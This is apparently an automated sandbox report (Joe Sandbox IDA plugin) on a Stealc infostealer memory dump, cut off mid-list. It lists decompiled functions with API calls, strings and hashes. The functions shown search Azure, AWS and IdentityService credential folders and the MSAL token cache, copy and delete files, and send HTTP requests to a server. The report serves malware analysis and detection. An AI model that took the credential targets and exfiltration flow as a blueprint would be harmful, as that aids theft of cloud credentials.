Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4068497927-2709115261
Opcode ID: 28e08be070e8bf53940279629b04bb6263194bbeaf6cfca5883d654b12b9e94c
Instruction ID: 35460cf6aa0c159e8a2368cacfdbdfb5f2fd37720c3aac5ac72ca5fcfefb9703
Opcode Fuzzy Hash: 28e08be070e8bf53940279629b04bb6263194bbeaf6cfca5883d654b12b9e94c
Instruction Fuzzy Hash: 51124E71910118DBCB18FBA0ED96EEE7338BF54301F404128F516A7091EF39AE59EB62

Function 00F24D70 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F24D87

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

lstrcatA.KERNEL32(?,00000000), ref: 00F24DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00F24DCD

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F2492C
Part of subcall function 00F24910: FindFirstFileA.KERNEL32(?,?), ref: 00F24943

memset.MSVCRT ref: 00F24E13
lstrcatA.KERNEL32(?,00000000), ref: 00F24E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00F24E59

Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FDC), ref: 00F24971
Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FE0), ref: 00F24987
Part of subcall function 00F24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24B7D
Part of subcall function 00F24910: FindClose.KERNEL32(000000FF), ref: 00F24B92

memset.MSVCRT ref: 00F24E9F
lstrcatA.KERNEL32(?,00000000), ref: 00F24EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00F24EE5

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F249B0
Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F308D2), ref: 00F249C5
Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F249E2
Part of subcall function 00F24910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F24A1E
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,0177DFF8,?,000003E8), ref: 00F24A4A
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,00F30FF8), ref: 00F24A5C
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,?), ref: 00F24A70
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,00F30FFC), ref: 00F24A82
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,?), ref: 00F24A96
Part of subcall function 00F24910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F24AAC
Part of subcall function 00F24910: DeleteFileA.KERNEL32(?), ref: 00F24B31

memset.MSVCRT ref: 00F24F2B

Strings

msal.cache, xrefs: 00F24EF0
\.IdentityService\, xrefs: 00F24ED9
Azure\.IdentityService, xrefs: 00F24EEB
*.*, xrefs: 00F24DD8
Azure\.aws, xrefs: 00F24E5F
*.*, xrefs: 00F24E64
\.azure\, xrefs: 00F24DC1
Azure\.azure, xrefs: 00F24DD3
\.aws\, xrefs: 00F24E4D

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: afd1893278f42ed23fbb9188f053431af61590d48d361518a2b769a2dd8f4d04
Instruction ID: 7e16cfba9fb0e351b955ba155ef2300ec8713274102b605228bfdce93f1158cb
Opcode Fuzzy Hash: afd1893278f42ed23fbb9188f053431af61590d48d361518a2b769a2dd8f4d04
Instruction Fuzzy Hash: CE41A1B5940318A7CB28F770EC47FDD3738BB14701F404594B68AA60C1EEB997D9AB92

Function 00F1CEF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F28B60: GetSystemTime.KERNEL32(?,01774AC0,00F305AE,?,?,?,?,?,?,?,?,?,00F14963,?,00000014), ref: 00F28B86

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F1D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 00F1D0CE
lstrcatA.KERNEL32(?,00000000,0177DDB8,00F31474,0177DDB8,00F31470,00000000), ref: 00F1D208
lstrcatA.KERNEL32(?,00F31478), ref: 00F1D217
lstrcatA.KERNEL32(?,00000000), ref: 00F1D22A
lstrcatA.KERNEL32(?,00F3147C), ref: 00F1D239
lstrcatA.KERNEL32(?,00000000), ref: 00F1D24C
lstrcatA.KERNEL32(?,00F31480), ref: 00F1D25B
lstrcatA.KERNEL32(?,00000000), ref: 00F1D26E
lstrcatA.KERNEL32(?,00F31484), ref: 00F1D27D
lstrcatA.KERNEL32(?,00000000), ref: 00F1D290
lstrcatA.KERNEL32(?,00F31488), ref: 00F1D29F
lstrcatA.KERNEL32(?,00000000), ref: 00F1D2B2
lstrcatA.KERNEL32(?,00F3148C), ref: 00F1D2C1
lstrcatA.KERNEL32(?,00000000), ref: 00F1D2D4
lstrcatA.KERNEL32(?,00F31490), ref: 00F1D2E3

Part of subcall function 00F2A820: lstrlenA.KERNEL32(00000000,?,?,00F25B54,00F30ADB,00F30ADA,?,?,00F26B16,00000000,?,017703D0,?,00F3110C,?,00000000), ref: 00F2A82B
Part of subcall function 00F2A820: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A885

lstrlenA.KERNEL32(?), ref: 00F1D32A
lstrlenA.KERNEL32(?), ref: 00F1D339
memset.MSVCRT ref: 00F1D388

Part of subcall function 00F2AA70: StrCmpCA.SHLWAPI(00000000,00F31470,00F1D1A2,00F31470,00000000), ref: 00F2AA8F

DeleteFileA.KERNEL32(00000000), ref: 00F1D3B4

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 1ed88825e15f9cd3d59695ac1894006f3d45c0fd54c8eb9d7a8e737e502481bd
Instruction ID: d0b996de7058fbb92bbffaca811781b431e0a4787c8cf3e3963676277a863c70
Opcode Fuzzy Hash: 1ed88825e15f9cd3d59695ac1894006f3d45c0fd54c8eb9d7a8e737e502481bd
Instruction Fuzzy Hash: 84E15071950218EBCB18EBA0ED96EEE7378BF14301F104168F117B7095DE39AE45EB62

Function 00F14880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
Part of subcall function 00F147B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
Part of subcall function 00F147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F14915
StrCmpCA.SHLWAPI(?,0177E098), ref: 00F1493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F14ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00F30DDB,00000000,?,?,00000000,?,",00000000,?,0177E058), ref: 00F14DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00F14E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F14E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F14E49
InternetCloseHandle.WININET(00000000), ref: 00F14EAD
InternetCloseHandle.WININET(00000000), ref: 00F14EC5
HttpOpenRequestA.WININET(00000000,0177E018,?,01781C78,00000000,00000000,00400100,00000000), ref: 00F14B15

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

InternetCloseHandle.WININET(00000000), ref: 00F14ECF

Strings

", xrefs: 00F14D33
------, xrefs: 00F14C69
------, xrefs: 00F14B28
------, xrefs: 00F149BD
", xrefs: 00F14BF2

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 3b3a222f3521b4f0db92e1e66359d9e2cb228090dca730356ca97d4ffaaecc11
Instruction ID: ee3be9483b0175548b0f7a4c09b4f266c84ecfce6193542263f0b106f012e5bb
Opcode Fuzzy Hash: 3b3a222f3521b4f0db92e1e66359d9e2cb228090dca730356ca97d4ffaaecc11
Instruction Fuzzy Hash: C312CD71911128ABDB15EB90ECA2FEEB378BF54300F504199F10666091EF746F89DF62

Function 00F28320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

RegOpenKeyExA.KERNEL32(00000000,0177E2E8,00000000,00020019,00000000,00F305B6), ref: 00F283A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F28426
wsprintfA.USER32 ref: 00F28459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00F2847B
RegCloseKey.ADVAPI32(00000000), ref: 00F2848C
RegCloseKey.ADVAPI32(00000000), ref: 00F28499

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Strings

?, xrefs: 00F2837A
%s\%s, xrefs: 00F2844D
- , xrefs: 00F285A3

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: b490d06e74ae88f97739e25bd0849191d714f767d23fa9ba28ec99ff49ef7e07
Instruction ID: 71ce6077aa69d150dc5cd1c51e40ded9b40d8b11df08a3bb1bf4982c10385c94
Opcode Fuzzy Hash: b490d06e74ae88f97739e25bd0849191d714f767d23fa9ba28ec99ff49ef7e07
Instruction Fuzzy Hash: 8D811D7195122C9BDB28DB50DC91FEAB7B8BF48700F008299E109A6180DF756F85DF90

Function 00F16280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F147EA
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14801
Part of subcall function 00F147B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00F14818
Part of subcall function 00F147B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00F14839
Part of subcall function 00F147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14849

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

InternetOpenA.WININET(00F30DFE,00000001,00000000,00000000,00000000), ref: 00F162E1
StrCmpCA.SHLWAPI(?,0177E098), ref: 00F16303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16335
HttpOpenRequestA.WININET(00000000,GET,?,01781C78,00000000,00000000,00400100,00000000), ref: 00F16385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F163BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F163D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F163FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F1646D
InternetCloseHandle.WININET(00000000), ref: 00F164EF
InternetCloseHandle.WININET(00000000), ref: 00F164F9
InternetCloseHandle.WININET(00000000), ref: 00F16503

Strings

GET, xrefs: 00F1637C
ERROR, xrefs: 00F16407
ERROR, xrefs: 00F164C9

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: d61df83529af9c60486550ed85c8690d761422f527e9b05cef37a79231556763
Instruction ID: 001c9f2d45c652ff22739510275c5e3af1348944f936890a5fe02938907b9103
Opcode Fuzzy Hash: d61df83529af9c60486550ed85c8690d761422f527e9b05cef37a79231556763
Instruction Fuzzy Hash: AB714B71A40318EBDB24DBA0EC59BEE7778BF44700F1081A9F10AAB1C4DBB56A85DF51

Function 00F25510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A820: lstrlenA.KERNEL32(00000000,?,?,00F25B54,00F30ADB,00F30ADA,?,?,00F26B16,00000000,?,017703D0,?,00F3110C,?,00000000), ref: 00F2A82B
Part of subcall function 00F2A820: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A885

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F256A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25857

Part of subcall function 00F2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F2A7E6

Part of subcall function 00F251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25228

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25318
Part of subcall function 00F252C0: lstrlenA.KERNEL32(00000000), ref: 00F2532F
Part of subcall function 00F252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00F25364
Part of subcall function 00F252C0: lstrlenA.KERNEL32(00000000), ref: 00F25383
Part of subcall function 00F252C0: strtok.MSVCRT(00000000,?), ref: 00F2539E
Part of subcall function 00F252C0: lstrlenA.KERNEL32(00000000), ref: 00F253AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F2578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25A0C
Sleep.KERNEL32(0000EA60), ref: 00F25A1B

Strings

ERROR, xrefs: 00F25932
ERROR, xrefs: 00F25693
ERROR, xrefs: 00F259FE
ERROR, xrefs: 00F2577D
ERROR, xrefs: 00F25636
ERROR, xrefs: 00F25849

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
